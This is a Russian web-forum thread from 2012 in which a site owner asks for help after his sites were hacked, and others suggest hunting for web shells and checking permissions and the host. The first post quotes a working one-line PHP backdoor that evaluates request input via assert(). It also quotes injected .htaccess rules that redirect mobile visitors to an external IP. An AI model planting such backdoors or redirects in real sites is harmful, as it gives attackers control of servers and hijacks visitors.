X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вопрос ХАК гуру, Взломали сайт
webscs
webscs
Topic Starter сообщение 8.5.2012, 22:29; Ответить: webscs
Сообщение #1


Участник
***

Группа: User
Сообщений: 225
Регистрация: 3.6.2010
Из: Москва
Поблагодарили: 40 раз
Репутация:   8  


Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.

  1. Появился php файл phpinfo c Кодом - <?
    define('PHPSESSID',@assert($_REQUEST['PHPSESSID']))
    or phpinfo();
    ?>
  2. в файл .htaccess появились строки

    ###AB.PROTECTION###
    RewriteEngine on
    RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|
    psp|PPC|Android" [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ httр://91[точка]224[точка]161[точка]175/go/1/[L,R=302]

    Если зайти с мобильных устройств, идет редирект на "httр://91[точка]224[точка]161[точка]175/go/1/"

    также в некоторых файлах строки вида

    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать

Сообщение отредактировал webscs - 8.5.2012, 22:31
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 8.5.2012, 23:34; Ответить: Informator
Сообщение #2


Новичок
*

Группа: User
Сообщений: 18
Регистрация: 4.4.2012
Из: Узбекистан
Поблагодарили: 7 раз
Репутация:   1  


(webscs @ 8.5.2012, 23:29) *
Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать


Здравствуйте.
Файл конфига узнать не проблема, если на сайте залит шелл, а он залит, раз имеет полные права управлением апача. Ищите шелл, он где – есть однозначно. Проверяйте папки, которые имеют права на запись, такие как cache, uploads, templates.

Если можно несколько вопросов: Сайты, которые имеют такие коды, находятся на одном IP адресе?
Какие права доступа были прописаны на файл .htaccess раньше?
И еще можно ссылку на любой из сайтов, где таврится такая беда?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 8.5.2012, 23:41; Ответить: House
Сообщение #3


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.

(Informator @ 8.5.2012, 23:34) *
раз имеет полные права управлением апача.

Есть сотни способов обойти логирование апача без прав root.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 9.5.2012, 0:16; Ответить: Informator
Сообщение #4


Новичок
*

Группа: User
Сообщений: 18
Регистрация: 4.4.2012
Из: Узбекистан
Поблагодарили: 7 раз
Репутация:   1  


(House @ 9.5.2012, 0:41) *
А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.


Есть сотни способов обойти логирование апача без прав root.


Я с вами полностью согласен. Дыр много, особенно в новом Апаче.

Просто если у него сайты весят на одном айпи, код будет снова появляться. Ему нужно будет чистить все сайты на этом айпи, а потом просто латать дыры.

Злили скорей всего через Wordpress, безопасность у этих CMS не очень.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 9.5.2012, 0:59; Ответить: House
Сообщение #5


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


(Informator @ 9.5.2012, 0:16) *
Злили скорей всего через Wordpress, безопасность у этих CMS не очень.

У дополнений и т.п. В движках нет уязвимостей, а если и есть, то они быстро латаются.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 9.5.2012, 2:33; Ответить: Electric
Сообщение #6


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Ищите шеллы в темах. Если на аккаунте есть еще сайты - ищите в них.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BADbIk
BADbIk
сообщение 10.5.2012, 15:45; Ответить: BADbIk
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 11
Регистрация: 10.5.2012
Поблагодарили: 4 раза
Репутация:   1  


Хостинг случайно не от РБК(hc.ru)? Обнаружил подобные изменения на одном из своих сайтов, судя по дате изменения были произведены вечером 7ого мая. В корне был создан файл phpinfo.php с приведенным выше содержимым, а .htaccess был заменен(!!!) на

(webscs @ 8.5.2012, 22:29) *
    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Из-за замены хтакксесса перестало работать половину страниц сайта - так собственно я и заметил неладное. Отписал в службу поддержки - там ответили шаблоном, что типа ваш сайт был взломан, проверьте ваш компьютер антивирусом и тд..

Мне кажется, изменения были внесены самим персоналом хостинг-центра, так как эти изменения появились сразу же после публикации статьи про уязвимость на хабре http://habrahabr.ru/post/143331/ - в комментах писалось, что рбк уязвим на каких-то тарифах. Видимо они хотели быстро все исправить, но накосячили и ссылаются теперь на взломы.

Вариант со взломом у меня отпал, т.к. сайт почти статичный, за исключением пары скриптов с несколькими if - так что взламывать там нечего, если только не был взломан сам сервер. Логи тоже пустые. Хостинг покупался в 2008 году, так что скорее всего это был именно тот самый уязвимый тариф.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вопрос по seo для интернет магазина
куда девать продвинутые товары, которые уже не выпускают
18 viktormerke 2812 15.12.2017, 15:18
автор: Smspva
Открытая тема (нет новых ответов) Вопрос к знатокам Instagram
20 SEOMR 4190 30.11.2017, 14:25
автор: DiscordPro
Открытая тема (нет новых ответов) Вопрос про Телеграмм
18 syd2010 1173 28.11.2017, 14:25
автор: PostBrigada
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыАrticle manager вопрос
0 Smile3D 441 24.11.2017, 18:27
автор: Smile3D
Открытая тема (нет новых ответов) Вопрос по трансферу доменов
8 MakDonald 1208 13.11.2017, 11:40
автор: bum


 



RSS Текстовая версия Сейчас: 17.12.2017, 20:00
Дизайн